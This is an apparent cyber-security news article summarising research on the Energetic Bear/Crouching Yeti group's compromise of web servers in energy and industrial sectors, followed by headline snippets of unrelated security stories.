A Well known APT group called Energetic Bear/Crouching Yeti attacked various companies servers with a strong focus on energy and industrial sectors around the World.
This cybercrime group attacking various companies webservers around the world using countless malware since 2010 and stolen a huge amount of sensitive data.
Mainly during 2016 and in early 2017, Energetic Bear group Compromising several webservers from the various organization.
The main task of these attack is to search and identify the vulnerabilities to gain the access to the various host and stealing the Authentication Data.
Cyber Criminals using phishing Emails with the malicious document to compromise the various servers and some of the compromised servers used for an auxiliary purpose that act as s host tools and logs.
Compromised server based on Russia, Ukraine, UK, Germany, Turkey, USA and other countries with the various role of Attack.
An attacker using the Specific pattern to infect the water whole servers by injecting a link into a web page or JS file ( file://IP/filename.png.).
Particular injected link initially request for images but eventually, it makes user connected to the Command & control server over SMB to extract the following data from infected servers.
Cyber Criminals using Various hacking Tools such as such as nmap, dirsearch, sqlmap, etc. to scan the vulnerable servers and compromised servers are used to conduct attacks on other resources.
Scanned resources are highly sensitive information such as medical data, cryptocurrency, confidential data including server activities and financial information.
According to Kaspersky Research, Most of the tools used found on compromised servers are open-source and publicly available on GitHub:
After they find the vulnerable servers then attackers try to bypass and inject the exploit to gain more access and pull out logs file and other sensitives data From compromised Victims.
Vincent Cannady, a professional who used to work as a consultant in the cybersecurity field, has been taken into custody…
Infected websites mimic legitimate human verification prompts (CAPTCHAs) to trick users, who often request seemingly innocuous clicks, resembling past CAPTCHA…
An emerging threat leverages Microsoft's Graph API to facilitate command-and-control (C&C) communications through Microsoft cloud services. Recently, security analysts at…
Apache ActiveMQ is a Java based communication management tool for communicating with multiple components in a server. It is an…
In the latest edition of Verizon's Data Breach Investigations Report (DBIR) for 2024, a concerning trend has been highlighted, a…
The United States government has issued a stark warning about a new wave of social engineering attacks orchestrated by North…